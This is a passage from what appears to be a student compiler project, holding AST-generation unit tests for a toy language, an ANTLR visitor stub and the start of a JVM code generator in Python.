12.e1; EndIf.\n EndIf.\n Return ;\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[]),Return(None)]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,352))\n\n\tdef test_326(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nVar: x=1,a[1]={12, \"asdf\"},b=1.21;\nVar: a,b[1]={\"this\"};\nEndBody.\"\"\"\n\t\texpect = 
Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('b'),[],FloatLiteral(1.21)),VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1],ArrayLiteral([StringLiteral(\"\"\"this\"\"\")]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,326))\n\n\tdef test_357(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\nIf !(True) Then\n\na = a <c;\nIf (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\nEndIf.\nReturn main();\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[]),Return(CallExpr(Id('main'),[]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,357))\n\n\tdef test_351(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n Break;\n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Continue;\n EndBody.\"\"\"\n\t\texpect = 
Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Break(),Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[]),Continue()]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,351))\n\n\tdef test_312(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n EndBody.\n Function: foo\n Parameter: a,b,c[1]\n Body:\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[])),FuncDecl(Id('foo'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[1],None)],([],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,312))\n\n\tdef test_316(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,316))\n\n\tdef test_387(self):\n\t\tinput = \"\"\"\n Function: foo\n Parameter: a,b,c\n Body:\n nothing(a[1][1][b[k]]);\n 
EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('foo'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None)],([],[CallStmt(Id('nothing'),[ArrayCell(Id('a'),[IntLiteral(1),IntLiteral(1),ArrayCell(Id('b'),[Id('k')])])])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,387))\n\n\tdef test_391(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: a[5] = {1,4,3,2,0};\n Var: b[2][3]={{1,2,3},{4,5,6}};\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('a'),[5],ArrayLiteral([IntLiteral(1),IntLiteral(4),IntLiteral(3),IntLiteral(2),IntLiteral(0)])),VarDecl(Id('b'),[2,3],ArrayLiteral([ArrayLiteral([IntLiteral(1),IntLiteral(2),IntLiteral(3)]),ArrayLiteral([IntLiteral(4),IntLiteral(5),IntLiteral(6)])]))],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,391))\n\n\tdef test_309(self):\n\t\tinput = \"\"\"Var: x, y[1][3]={{{12,1}, {12., 12e3}},{23}, {13,32}};\nFunction: fact\nParameter: n\nBody:\na = a < b;\nIf n == 0 Then\nReturn 1;\nElse\nReturn n * fact(n-1);\nEndIf.\nEndBody.\nFunction: main\nBody:\nx = 10;\nfact (x);\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],None),VarDecl(Id('y'),[1,3],ArrayLiteral([ArrayLiteral([ArrayLiteral([IntLiteral(12),IntLiteral(1)]),ArrayLiteral([FloatLiteral(12.0),FloatLiteral(12000.0)])]),ArrayLiteral([IntLiteral(23)]),ArrayLiteral([IntLiteral(13),IntLiteral(32)])])),FuncDecl(Id('fact'),[VarDecl(Id('n'),[],None)],([],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('b'))),If([(BinaryOp(\"\"\"==\"\"\",Id('n'),IntLiteral(0)),[],[Return(IntLiteral(1))])],([],[Return(BinaryOp(\"\"\"*\"\"\",Id('n'),CallExpr(Id('fact'),[BinaryOp(\"\"\"-\"\"\",Id('n'),IntLiteral(1))])))]))])),FuncDecl(Id('main'),[],([],[Assign(Id('x'),IntLiteral(10)),CallStmt(Id('fact'),[Id('x')])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,309))\n\n\tdef 
test_384(self):\n\t\tinput = \"\"\"\n Function: main_123_main\n Parameter: a, b[1][100]\n Body:\n While a<b Do\n EndWhile.\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main_123_main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1,100],None)],([],[While(BinaryOp(\"\"\"<\"\"\",Id('a'),Id('b')),([],[]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,384))\n\n\tdef test_374(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\na = (a + b) +. (a-a-.a*a*.a\\.b%!c&&a||a==b);\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"+.\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),BinaryOp(\"\"\"==\"\"\",BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"&&\"\"\",BinaryOp(\"\"\"-.\"\"\",BinaryOp(\"\"\"-\"\"\",Id('a'),Id('a')),BinaryOp(\"\"\"%\"\"\",BinaryOp(\"\"\"\\.\"\"\",BinaryOp(\"\"\"*.\"\"\",BinaryOp(\"\"\"*\"\"\",Id('a'),Id('a')),Id('a')),Id('b')),UnaryOp(\"\"\"!\"\"\",Id('c')))),Id('a')),Id('a')),Id('b'))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,374))\n\n\tdef test_359(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\nfoo(arg1, \"???\", foo(nothing));\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[CallStmt(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')])])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,359))\n\n\tdef test_368(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1 ];\n EndBody.\"\"\"\n\t\texpect = 
Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),ArrayCell(Id('b'),[BinaryOp(\"\"\"+\"\"\",ArrayCell(CallExpr(Id('something'),[]),[ArrayCell(Id('a'),[IntLiteral(1)])]),IntLiteral(1))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,368))\n\n\tdef test_313(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var:x = 1, y;\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('y'),[],None)],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,313))\n\n\tdef test_344(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n a = !(x && y || b) && (a || abc);\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Assign(Id('a'),BinaryOp(\"\"\"&&\"\"\",UnaryOp(\"\"\"!\"\"\",BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"&&\"\"\",Id('x'),Id('y')),Id('b'))),BinaryOp(\"\"\"||\"\"\",Id('a'),Id('abc'))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,344))\n\n\tdef test_305(self):\n\t\tinput = \"\"\"Var: a,b=1,c[3]={1,2,3};\nFunction: main\nBody:\nReturn;\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],IntLiteral(1)),VarDecl(Id('c'),[3],ArrayLiteral([IntLiteral(1),IntLiteral(2),IntLiteral(3)])),FuncDecl(Id('main'),[],([],[Return(None)]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,305))\n\n\tdef test_321(self):\n\t\tinput = \"\"\"Function: main\n Parameter: a\n Body:\n If 1 + a - b * foo() > 1 Then\n EndIf.\n EndBody.\"\"\"\n\t\texpect = 
Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"-\"\"\",BinaryOp(\"\"\"+\"\"\",IntLiteral(1),Id('a')),BinaryOp(\"\"\"*\"\"\",Id('b'),CallExpr(Id('foo'),[]))),IntLiteral(1)),[],[])],[])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,321))\n\n\tdef test_385(self):\n\t\tinput = \"\"\"Function: somwname\nBody:\n\nEndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('somwname'),[],([],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,385))\n\n\tdef test_301(self):\n\t\tinput = \"\"\"Var:x = 1;\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],IntLiteral(1))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,301))\n\n\tdef test_323(self):\n\t\tinput = \"\"\"Function: main\n Parameter: a\n Body:\n EndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,323))\n\n\tdef test_371(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n a = b[something()[a[1]] + 1][c + d < 1] + c *. 
d[1][21 * 0x21AF];\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",ArrayCell(Id('b'),[BinaryOp(\"\"\"+\"\"\",ArrayCell(CallExpr(Id('something'),[]),[ArrayCell(Id('a'),[IntLiteral(1)])]),IntLiteral(1)),BinaryOp(\"\"\"<\"\"\",BinaryOp(\"\"\"+\"\"\",Id('c'),Id('d')),IntLiteral(1))]),BinaryOp(\"\"\"*.\"\"\",Id('c'),ArrayCell(Id('d'),[IntLiteral(1),BinaryOp(\"\"\"*\"\"\",IntLiteral(21),IntLiteral(8623))]))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,371))\n\n\tdef test_363(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n foo(arg1, \"???\", foo(nothing), {\"asdab\", {1,2.e2,123e1,\"nothing\"}});\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[CallStmt(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')]),ArrayLiteral([StringLiteral(\"\"\"asdab\"\"\"),ArrayLiteral([IntLiteral(1),FloatLiteral(200.0),FloatLiteral(1230.0),StringLiteral(\"\"\"nothing\"\"\")])])])]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,363))\n\n\tdef test_302(self):\n\t\tinput = \"\"\"Var:x = 1, y;\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('y'),[],None)])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,302))\n\n\tdef test_393(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, a[1][12]\nBody:\nVar: x[1][2] = {\"ab\",\"da\"};\na[3 + foo(2)] = a[b[2][3]] + 4;\nEndBody.\"\"\"\n\t\texpect = 
Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([VarDecl(Id('x'),[1,2],ArrayLiteral([StringLiteral(\"\"\"ab\"\"\"),StringLiteral(\"\"\"da\"\"\")]))],[Assign(ArrayCell(Id('a'),[BinaryOp(\"\"\"+\"\"\",IntLiteral(3),CallExpr(Id('foo'),[IntLiteral(2)]))]),BinaryOp(\"\"\"+\"\"\",ArrayCell(Id('a'),[ArrayCell(Id('b'),[IntLiteral(2),IntLiteral(3)])]),IntLiteral(4)))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,393))\n\n\tdef test_397(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a, a[1][12]\nBody:\nIf expr Then \nElseIf expr Then\nWhile expr Do EndWhile.\nDo Return; While {{}} EndDo.\nElse nothing(); a=b+a; Continue;\nEndIf.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([],[If([(Id('expr'),[],[]),(Id('expr'),[],[While(Id('expr'),([],[])),Dowhile(([],[Return(None)]),ArrayLiteral([ArrayLiteral([])]))])],([],[CallStmt(Id('nothing'),[]),Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('b'),Id('a'))),Continue()]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,397))\n\n\tdef test_355(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n If !(True) Then\n \n a = a <c;\n If (a + b > c) Then a = a+b; ElseIf a == b Then writeln(i); Else a = 12.e1; EndIf.\n EndIf.\n Return (a < 1) || (b >. 
!c);\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[If([(UnaryOp(\"\"\"!\"\"\",BooleanLiteral(True)),[],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",Id('a'),Id('c'))),If([(BinaryOp(\"\"\">\"\"\",BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')),Id('c')),[],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",Id('a'),Id('b')))]),(BinaryOp(\"\"\"==\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('writeln'),[Id('i')])])],([],[Assign(Id('a'),FloatLiteral(120.0))]))])],[]),Return(BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"<\"\"\",Id('a'),IntLiteral(1)),BinaryOp(\"\"\">.\"\"\",Id('b'),UnaryOp(\"\"\"!\"\"\",Id('c')))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,355))\n\n\tdef test_361(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Body:\n a = a[c[1][b]][1] < foo(arg1, \"???\", foo(nothing));\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"<\"\"\",ArrayCell(Id('a'),[ArrayCell(Id('c'),[IntLiteral(1),Id('b')]),IntLiteral(1)]),CallExpr(Id('foo'),[Id('arg1'),StringLiteral(\"\"\"???\"\"\"),CallExpr(Id('foo'),[Id('nothing')])])))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,361))\n\n" }, { "alpha_fraction": 0.7777777910232544, "alphanum_fraction": 0.7829457521438599, "avg_line_length": 32.69565200805664, "blob_id": "f200236fd62692909c2f265f71c24ad160b871ac", "content_id": "b274abcba24842f22b73cc91bfccff2bb1cdd0ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 774, "license_type": "no_license", "max_line_length": 99, "num_lines": 23, "path": "/target/LexicalAnalysisVisitor.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from LexicalAnalysis.g4 by ANTLR 4.8\nfrom antlr4 import *\nif __name__ is not None and \".\" in __name__:\n from .LexicalAnalysisParser import 
LexicalAnalysisParser\nelse:\n from LexicalAnalysisParser import LexicalAnalysisParser\n\n# This class defines a complete generic visitor for a parse tree produced by LexicalAnalysisParser.\n\nclass LexicalAnalysisVisitor(ParseTreeVisitor):\n\n # Visit a parse tree produced by LexicalAnalysisParser#program.\n def visitProgram(self, ctx:LexicalAnalysisParser.ProgramContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by LexicalAnalysisParser#letter.\n def visitLetter(self, ctx:LexicalAnalysisParser.LetterContext):\n return self.visitChildren(ctx)\n\n\n\ndel LexicalAnalysisParser" }, { "alpha_fraction": 0.5384231805801392, "alphanum_fraction": 0.5412672162055969, "avg_line_length": 42.01161193847656, "blob_id": "423e42d9e01e04f562ddc2049dcdd69c9515301b", "content_id": "b2eac143e225da6aa496ac3a3b8e1e0daea0ffc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34107, "license_type": "no_license", "max_line_length": 176, "num_lines": 775, "path": "/Assignments/assignment4/src/main/bkit/codegen/CodeGenerator.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "'''\r\n * @author Nguyen Hua Phung\r\n * @version 1.0\r\n * 23/10/2015\r\n * This file provides a simple version of code generator\r\n *\r\n'''\r\nfrom abc import ABC, abstractmethod\r\n\r\nfrom Visitor import BaseVisitor\r\nfrom Emitter import Emitter\r\nfrom Frame import Frame\r\nfrom AST import * \r\nfrom functools import reduce\r\n\r\nclass MethodEnv():\r\n def __init__(self, frame, sym):\r\n self.frame = frame\r\n self.symbol = sym\r\nclass Symbol:\r\n def __init__(self,name,mtype,value = None):\r\n self.name = name\r\n self.mtype = mtype\r\n self.value = value\r\nclass CName:\r\n def __init__(self,n):\r\n self.value = n\r\nclass Index:\r\n def __init__(self,n):\r\n self.value = n\r\nclass Type(ABC): pass\r\nclass IntType(Type): pass\r\nclass FloatType(Type): pass\r\nclass VoidType(Type): pass\r\nclass 
ClassType(Type):\r\n def __init__(self,n):\r\n self.cname = n\r\nclass StringType(Type):pass\r\nclass BoolType(Type): pass\r\nclass MType(Type):\r\n def __init__(self,i,o):\r\n self.partype = i #List[Type]\r\n self.rettype = o #Type\t\r\nclass ArrayType(Type):\r\n def __init__(self,et,*s):\r\n self.eleType = et #Type\r\n self.dimen = s #List[int] \r\n\r\nclass SubBody():\r\n def __init__(self, frame_, symlist_):\r\n self.frame = frame_\r\n self.symbol = symlist_\r\n self.body = []\r\n self.ret = VoidType()\r\n \r\n def printout(self, code_):\r\n self.body += [code_]\r\n \r\n def emitPrintout(self, emiter):\r\n [emiter.emit.printout(code) for code in self.body]\r\n\r\n def setRet(self, rettype_):\r\n self.ret = rettype_\r\n \r\n def getRet(self):\r\n return self.ret\r\n\r\nclass Access():\r\n def __init__(self, frame_, sym_, isLeft=False):\r\n self.frame = frame_\r\n self.symbol = sym_\r\n self.isLeft = isLeft\r\n self.body = []\r\n self.ret = None\r\n \r\n def printout(self, code_):\r\n self.body += [code_]\r\n \r\n def getCode(self):\r\n return self.body\r\n \r\n def setRet(self, rettype_):\r\n self.ret = rettype_\r\n\r\n def getRet(self):\r\n return self.ret\r\n\r\nclass StaticAttribute():\r\n def __init__(self, className, name, ast):\r\n self.className = className\r\n self.name = name\r\n self.ast = ast\r\n def init(self, a, codegen):\r\n init_code, typ = codegen.visit(self.ast.varInit, a)\r\n codegen.emit.printAt(codegen.emit.emitATTRIBUTE(self.name, typ, False, ''), codegen.emit.getBuffLen() - 1 )\r\n # codegen.emit.printout(init_code)\r\n # codegen.emit.printout(codegen.emit.emitPUTSTATIC(self.className + '.' 
+ self.name, typ, a.frame))\r\n\r\nclass CodeGenerator():\r\n def __init__(self):\r\n self.libName = \"io\"\r\n\r\n def init(self):\r\n return [Symbol(\"read\", MType([], StringType()), CName(self.libName)),\r\n Symbol(\"printLn\", MType([], VoidType()), CName(self.libName)),\r\n Symbol(\"printStrLn\", MType([StringType()], VoidType()), CName(self.libName)),\r\n Symbol(\"print\", MType([StringType()], VoidType()), CName(self.libName)),\r\n\t\t Symbol(\"string_of_int\", MType([IntType()], StringType()), CName(self.libName))\r\n ]\r\n\r\n def gen(self, ast, dir_):\r\n #ast: AST\r\n #dir_: String\r\n\r\n gl = self.init()\r\n gc = CodeGenVisitor(ast, gl, dir_)\r\n gc.visit(ast, None)\r\n\r\n\r\n\r\nclass CodeGenVisitor(BaseVisitor):\r\n def __init__(self, astTree, env, dir_):\r\n #astTree: AST\r\n #env: List[Symbol]\r\n #dir_: File\r\n\r\n self.astTree = astTree\r\n self.env = env\r\n self.className = \"MCClass\"\r\n self.path = dir_\r\n self.emit = Emitter(self.path + \"/\" + self.className + \".j\")\r\n self.static = []\r\n self.initVar = []\r\n self.ret = []\r\n self.envFuncNum = 0\r\n self.staticFunction = []\r\n self.initStatic = []\r\n self.clinitStackSize = 0\r\n\r\n def visitProgram(self, ast:Program, c):\r\n #ast: Program\r\n #c: Any\r\n\r\n self.emit.printout(self.emit.emitPROLOG(self.className, \"java.lang.Object\"))\r\n e = MethodEnv(None, self.env)\r\n self.envFuncNum = len(self.env)\r\n # self.env = [self.visit(decl, e) for decl in ast.decl] + self.env\r\n for decl in ast.decl:\r\n s = self.visit(decl, e)\r\n e.symbol.append(s)\r\n # reduce(lambda e, decl: e.symbol + [self.visit(decl, e)], ast.decl, e)\r\n # self.genMain(e) \r\n # generate default constructor\r\n self.genInit()\r\n self.genClinit()\r\n # generate class init if necessary\r\n self.emit.emitEPILOG()\r\n return c\r\n \r\n # We do not need to save the signature of all the function due to\r\n # the assumption that there is no semantic error!\r\n # In the callee we only need to infer the type it 
self\r\n # def visitGlobal(self,ast,c):\r\n # if isinstance(ast, FuncDecl):\r\n # return Symbol(ast.name.name, MType([None]*len(ast.param), None))\r\n # if isinstance(ast, VarDecl):\r\n # return Symbol(ast.variable.name, None)\r\n\r\n def genInit(self):\r\n methodname,methodtype = \"<init>\",MType([],VoidType())\r\n frame = Frame(methodname, methodtype.rettype)\r\n self.emit.printout(self.emit.emitMETHOD(methodname,methodtype,False,frame))\r\n frame.enterScope(True)\r\n varname,vartype,varindex = \"this\",ClassType(self.className),frame.getNewIndex()\r\n startLabel, endLabel = frame.getStartLabel(), frame.getEndLabel()\r\n self.emit.printout(self.emit.emitVAR(varindex, varname, vartype, startLabel, endLabel,frame ))\r\n self.emit.printout(self.emit.emitLABEL(startLabel,frame))\r\n self.emit.printout(self.emit.emitREADVAR(varname, vartype, varindex, frame))\r\n self.emit.printout(self.emit.emitINVOKESPECIAL(frame))\r\n # printout the init_code of the static field\r\n a = Access(frame, self.env, isLeft=False)\r\n [static.init(a, self) for static in self.static]\r\n self.clinitStackSize = a.frame.getMaxOpStackSize()\r\n # _________\r\n self.emit.printout(self.emit.emitLABEL(endLabel, frame))\r\n self.emit.printout(self.emit.emitRETURN(methodtype.rettype, frame))\r\n self.emit.printout(self.emit.emitENDMETHOD(frame))\r\n \r\n def genClinit(self):\r\n methodname,methodtype = \"<clinit>\",MType([],VoidType())\r\n frame = Frame(methodname, methodtype.rettype)\r\n self.emit.printout(self.emit.emitMETHOD(methodname,methodtype,True,frame))\r\n frame.enterScope(True)\r\n varname,vartype,varindex = \"this\",ClassType(self.className),frame.getNewIndex()\r\n startLabel, endLabel = frame.getStartLabel(), frame.getEndLabel()\r\n # self.emit.printout(self.emit.emitVAR(varindex, varname, vartype, startLabel, endLabel,frame ))\r\n self.emit.printout(self.emit.emitLABEL(startLabel,frame))\r\n # self.emit.printout(self.emit.emitREADVAR(varname, vartype, varindex, frame))\r\n # 
self.emit.printout(self.emit.emitINVOKESPECIAL(frame))\r\n # printout the init_code of the static field\r\n [self.emit.printout(p) for p in self.initStatic]\r\n self.initStatic = []\r\n frame.maxOpStackSize = self.clinitStackSize\r\n # _________\r\n self.emit.printout(self.emit.emitLABEL(endLabel, frame))\r\n self.emit.printout(self.emit.emitRETURN(methodtype.rettype, frame))\r\n self.emit.printout(self.emit.emitENDMETHOD(frame))\r\n \"\"\"\r\n * In var decl, this should add the symbol to frame for later work\r\n TODOs: \r\n @param: self\r\n @param: \r\n \"\"\"\r\n def visitVarDecl(self,ctx:VarDecl,o):\r\n var_name = ctx.variable.name\r\n dimen = list(ctx.varDimen)\r\n if isinstance(dimen, tuple):\r\n dimen = dimen[0]\r\n a = Access(o.frame, o.symbol, isLeft=False)\r\n if ctx.varInit:\r\n # handle normal declarations with the assumption of the ass4\r\n if o.frame == None:\r\n self.static.append(StaticAttribute(self.className, var_name, ctx))\r\n methodname,methodtype = \"<init>\",MType([],VoidType())\r\n a.frame = Frame(methodname, methodtype.rettype)\r\n init_code, typ = self.visit(ctx.varInit, a)\r\n init_code += self.emit.emitPUTSTATIC(self.className + '.' 
